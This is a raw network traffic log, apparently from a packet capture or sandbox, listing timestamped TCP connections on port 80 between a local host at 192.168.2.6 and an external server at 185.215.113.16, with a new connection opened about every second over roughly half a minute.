Jul 26, 2024 20:59:56.371026993 CEST	51126	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:56.371906042 CEST	51126	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:56.376813889 CEST	80	51126	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:56.615612984 CEST	80	51126	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:56.615729094 CEST	51126	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:56.720087051 CEST	51126	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:56.720406055 CEST	51127	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:56.725541115 CEST	80	51127	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:56.725630045 CEST	51127	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:56.725807905 CEST	51127	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:56.726356983 CEST	80	51126	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:56.726408958 CEST	51126	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:56.736609936 CEST	80	51127	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:57.661175966 CEST	80	51127	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:57.661279917 CEST	51127	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:57.661989927 CEST	51127	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:57.668052912 CEST	80	51127	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:57.922636986 CEST	80	51127	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:57.922710896 CEST	51127	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:58.034550905 CEST	51127	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:58.034876108 CEST	51128	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:58.040096998 CEST	80	51127	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:58.040219069 CEST	51127	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:58.041224957 CEST	80	51128	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:58.041309118 CEST	51128	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:58.041457891 CEST	51128	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:58.046308041 CEST	80	51128	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:58.842703104 CEST	80	51128	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:58.842919111 CEST	51128	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:58.843723059 CEST	51128	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:58.848985910 CEST	80	51128	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:59.092746019 CEST	80	51128	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:59.093008995 CEST	51128	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:59.204405069 CEST	51128	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:59.204725981 CEST	51129	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:59.223925114 CEST	80	51129	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:59.224107027 CEST	51129	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:59.224313974 CEST	51129	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:59.233299971 CEST	80	51129	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:59.233433962 CEST	80	51128	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:59.233519077 CEST	51128	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:59.969131947 CEST	80	51129	185.215.113.16	192.168.2.6
Jul 26, 2024 20:59:59.969264030 CEST	51129	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:59.970283031 CEST	51129	80	192.168.2.6	185.215.113.16
Jul 26, 2024 20:59:59.975140095 CEST	80	51129	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:00.215368032 CEST	80	51129	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:00.215532064 CEST	51129	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:00.329458952 CEST	51129	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:00.329833031 CEST	51130	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:00.334800005 CEST	80	51130	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:00.334904909 CEST	51130	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:00.334973097 CEST	80	51129	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:00.335031986 CEST	51129	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:00.335089922 CEST	51130	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:00.342005014 CEST	80	51130	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:01.144354105 CEST	80	51130	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:01.144561052 CEST	51130	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:01.146190882 CEST	51130	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:01.151074886 CEST	80	51130	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:01.407320023 CEST	80	51130	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:01.407465935 CEST	51130	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:01.517168045 CEST	51130	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:01.517514944 CEST	51131	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:01.524971008 CEST	80	51131	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:01.525105953 CEST	51131	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:01.525332928 CEST	51131	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:01.525507927 CEST	80	51130	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:01.525571108 CEST	51130	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:01.533355951 CEST	80	51131	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:03.069415092 CEST	80	51131	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:03.069533110 CEST	51131	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:03.070761919 CEST	80	51131	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:03.070817947 CEST	51131	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:03.070935011 CEST	80	51131	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:03.070972919 CEST	51131	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:03.096155882 CEST	51131	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:03.101855993 CEST	80	51131	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:03.342699051 CEST	80	51131	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:03.342799902 CEST	51131	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:03.456945896 CEST	51131	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:03.457298040 CEST	51132	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:03.464211941 CEST	80	51132	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:03.464282036 CEST	51132	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:03.464626074 CEST	51132	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:03.480824947 CEST	80	51132	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:03.501616955 CEST	80	51131	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:03.501704931 CEST	51131	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:04.385667086 CEST	80	51132	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:04.385730028 CEST	51132	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:04.389139891 CEST	51132	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:04.389466047 CEST	51133	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:04.394423962 CEST	80	51133	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:04.394504070 CEST	51133	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:04.395015001 CEST	51133	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:04.400006056 CEST	80	51133	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:04.402136087 CEST	80	51132	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:04.402185917 CEST	51132	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:05.173918962 CEST	80	51133	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:05.173993111 CEST	51133	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:05.286572933 CEST	51133	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:05.286907911 CEST	51134	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:05.293508053 CEST	80	51134	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:05.293694019 CEST	51134	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:05.294424057 CEST	51134	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:05.295527935 CEST	80	51133	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:05.295589924 CEST	51133	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:05.300775051 CEST	80	51134	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:06.057610035 CEST	80	51134	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:06.057674885 CEST	51134	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:06.060897112 CEST	51134	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:06.061268091 CEST	51135	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:06.066026926 CEST	80	51135	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:06.066090107 CEST	51135	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:06.066302061 CEST	51135	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:06.066672087 CEST	80	51134	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:06.066719055 CEST	51134	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:06.071530104 CEST	80	51135	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:06.812999010 CEST	80	51135	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:06.813108921 CEST	51135	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:06.926727057 CEST	51135	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:06.927347898 CEST	51136	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:06.932542086 CEST	80	51136	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:06.932987928 CEST	51136	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:06.933584929 CEST	51136	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:06.939491987 CEST	80	51136	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:06.943068027 CEST	80	51135	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:06.943125963 CEST	51135	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:07.711100101 CEST	80	51136	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:07.711327076 CEST	51136	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:07.714868069 CEST	51136	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:07.715536118 CEST	51137	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:07.720515966 CEST	80	51136	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:07.720586061 CEST	51136	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:07.720721006 CEST	80	51137	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:07.720783949 CEST	51137	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:07.721373081 CEST	51137	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:07.727622032 CEST	80	51137	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:08.493729115 CEST	80	51137	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:08.493933916 CEST	51137	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:08.613522053 CEST	51137	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:08.613648891 CEST	51138	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:08.619462013 CEST	80	51138	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:08.619673967 CEST	51138	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:08.619985104 CEST	51138	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:08.621236086 CEST	80	51137	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:08.621283054 CEST	51137	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:08.624814034 CEST	80	51138	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:09.392926931 CEST	80	51138	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:09.393131018 CEST	51138	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:09.397387981 CEST	51138	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:09.402267933 CEST	80	51138	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:09.688348055 CEST	80	51138	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:09.688504934 CEST	51138	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:09.812772036 CEST	51138	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:09.813273907 CEST	51139	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:09.818203926 CEST	80	51138	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:09.818239927 CEST	80	51139	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:09.818325043 CEST	51139	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:09.818468094 CEST	51139	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:09.819742918 CEST	51138	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:09.823271990 CEST	80	51139	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:10.609327078 CEST	80	51139	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:10.609401941 CEST	51139	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:10.612833977 CEST	51139	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:10.613214970 CEST	51140	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:10.618029118 CEST	80	51140	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:10.618194103 CEST	51140	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:10.618382931 CEST	80	51139	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:10.618424892 CEST	51139	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:10.618573904 CEST	51140	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:10.624121904 CEST	80	51140	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:11.387840986 CEST	80	51140	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:11.387988091 CEST	51140	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:11.508121014 CEST	51140	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:11.508820057 CEST	51141	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:11.513842106 CEST	80	51141	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:11.513921022 CEST	51141	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:11.514054060 CEST	80	51140	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:11.514277935 CEST	51140	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:11.514400959 CEST	51141	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:11.519990921 CEST	80	51141	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:12.267776966 CEST	80	51141	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:12.267859936 CEST	51141	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:12.271362066 CEST	51141	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:12.271727085 CEST	51142	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:12.276621103 CEST	80	51142	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:12.276979923 CEST	51142	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:12.277200937 CEST	51142	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:12.277451038 CEST	80	51141	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:12.277503967 CEST	51141	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:12.282269955 CEST	80	51142	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:13.047894001 CEST	80	51142	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:13.048057079 CEST	51142	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:13.159933090 CEST	51142	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:13.160329103 CEST	51143	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:13.165167093 CEST	80	51143	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:13.165273905 CEST	51143	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:13.165870905 CEST	51143	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:13.166237116 CEST	80	51142	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:13.167874098 CEST	51142	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:13.170689106 CEST	80	51143	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:13.931571007 CEST	80	51143	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:13.933065891 CEST	51143	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:13.941358089 CEST	51143	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:13.941812992 CEST	51144	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:13.946640968 CEST	80	51144	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:13.946918964 CEST	51144	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:13.947204113 CEST	51144	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:13.952037096 CEST	80	51144	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:13.953430891 CEST	80	51143	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:13.955290079 CEST	51143	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:14.728379965 CEST	80	51144	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:14.728441954 CEST	51144	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:14.849225998 CEST	51144	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:14.849590063 CEST	51145	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:14.856888056 CEST	80	51145	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:14.856976986 CEST	51145	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:14.857645988 CEST	51145	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:14.859292984 CEST	80	51144	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:14.859360933 CEST	51144	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:14.862392902 CEST	80	51145	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:15.612291098 CEST	80	51145	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:15.615370989 CEST	51145	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:15.615818977 CEST	51145	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:15.616504908 CEST	51146	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:15.621263981 CEST	80	51145	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:15.621318102 CEST	51145	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:15.621582031 CEST	80	51146	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:15.621685028 CEST	51146	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:15.621970892 CEST	51146	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:15.627173901 CEST	80	51146	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:16.372337103 CEST	80	51146	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:16.376359940 CEST	51146	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:16.504411936 CEST	51146	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:16.504909992 CEST	51147	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:16.510457993 CEST	80	51147	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:16.510658979 CEST	51147	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:16.510783911 CEST	80	51146	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:16.510839939 CEST	51146	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:16.510842085 CEST	51147	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:16.516552925 CEST	80	51147	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:17.266690016 CEST	80	51147	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:17.266752005 CEST	51147	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:17.270174980 CEST	51147	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:17.270478010 CEST	51148	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:17.276120901 CEST	80	51147	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:17.276202917 CEST	51147	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:17.276257038 CEST	80	51148	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:17.276319027 CEST	51148	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:17.276571035 CEST	51148	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:17.281402111 CEST	80	51148	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:18.052725077 CEST	80	51148	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:18.052834988 CEST	51148	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:18.349157095 CEST	51148	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:18.349941015 CEST	51149	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:18.361490965 CEST	80	51149	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:18.361758947 CEST	51149	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:18.362399101 CEST	80	51148	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:18.362607002 CEST	51148	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:18.363507986 CEST	51149	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:18.376848936 CEST	80	51149	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:19.160573959 CEST	80	51149	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:19.160645008 CEST	51149	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:19.163579941 CEST	51149	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:19.164098024 CEST	51150	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:19.169430971 CEST	80	51149	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:19.169562101 CEST	80	51150	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:19.169574022 CEST	51149	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:19.169812918 CEST	51150	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:19.170006990 CEST	51150	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:19.176413059 CEST	80	51150	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:19.937151909 CEST	80	51150	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:19.937236071 CEST	51150	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:20.050520897 CEST	51150	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:20.050916910 CEST	51151	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:20.061450958 CEST	80	51151	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:20.061549902 CEST	51151	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:20.061855078 CEST	51151	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:20.067617893 CEST	80	51151	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:20.074316025 CEST	80	51150	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:20.074594975 CEST	51150	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:20.857263088 CEST	80	51151	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:20.857398033 CEST	51151	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:20.860699892 CEST	51151	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:20.861068010 CEST	51152	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:20.866883993 CEST	80	51151	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:20.866956949 CEST	51151	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:20.866991043 CEST	80	51152	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:20.867057085 CEST	51152	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:20.867443085 CEST	51152	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:20.878117085 CEST	80	51152	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:21.668042898 CEST	80	51152	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:21.668142080 CEST	51152	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:21.784786940 CEST	51152	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:21.785187960 CEST	51153	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:21.801727057 CEST	80	51153	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:21.801812887 CEST	51153	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:21.803776026 CEST	51154	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:21.807384014 CEST	80	51152	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:21.808686972 CEST	80	51154	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:21.808852911 CEST	51152	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:21.808852911 CEST	51154	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:21.808960915 CEST	51154	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:21.814313889 CEST	80	51154	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:22.596292019 CEST	80	51154	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:22.596363068 CEST	51154	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:22.708904982 CEST	51154	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:22.709386110 CEST	51155	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:22.714713097 CEST	80	51155	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:22.714780092 CEST	51155	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:22.714916945 CEST	51155	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:22.715054989 CEST	80	51154	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:22.716052055 CEST	51154	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:22.720298052 CEST	80	51155	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:23.485802889 CEST	80	51155	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:23.485868931 CEST	51155	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:23.488806963 CEST	51155	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:23.489213943 CEST	51156	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:23.496916056 CEST	80	51156	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:23.497014046 CEST	51156	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:23.497180939 CEST	51156	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:23.497714996 CEST	80	51155	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:23.497925997 CEST	51155	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:23.502037048 CEST	80	51156	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:24.299350977 CEST	80	51156	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:24.301153898 CEST	51156	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:24.410465002 CEST	51156	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:24.410803080 CEST	51157	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:24.489113092 CEST	80	51157	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:24.489197969 CEST	51157	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:24.489623070 CEST	51157	80	192.168.2.6	185.215.113.16
Jul 26, 2024 21:00:24.498333931 CEST	80	51156	185.215.113.16	192.168.2.6
Jul 26, 2024 21:00:24.498557091 CEST	51156	80	192.168.2.6	185.215.113.16
